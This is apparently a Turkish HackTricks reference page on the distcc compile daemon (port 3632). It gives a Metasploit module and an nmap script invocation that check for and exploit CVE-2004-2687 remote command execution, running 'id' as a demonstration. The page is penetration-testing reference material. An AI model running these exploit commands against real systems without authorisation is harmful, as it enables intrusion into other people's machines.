HackTrickstip
AWS Hacking'i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: 
HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.
Temel Bilgiler
Distcc, ağdaki diğer bilgisayarların boşta kalan işlem gücünü kullanarak derleme sürecini geliştiren bir araçtır. Distcc bir makinede kurulduğunda, bu makine derleme görevlerini başka bir sisteme dağıtma yeteneğine sahip olur. Bu alıcı sistemin distccd daemon'unu çalıştırması ve gönderilen kodu işlemek için uyumlu bir derleyici yüklü olması gerekir.
Varsayılan port: 3632
PORT STATE SERVICE
3632/tcp open distccd
Sömürü
Rastgele kod çalıştırmak için CVE-2004-2687'ye karşı savunmasız olup olmadığını kontrol edin:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
Bu hizmeti tespit ettiğini düşünmüyorum.
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post created by Álex B (@r1p)
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.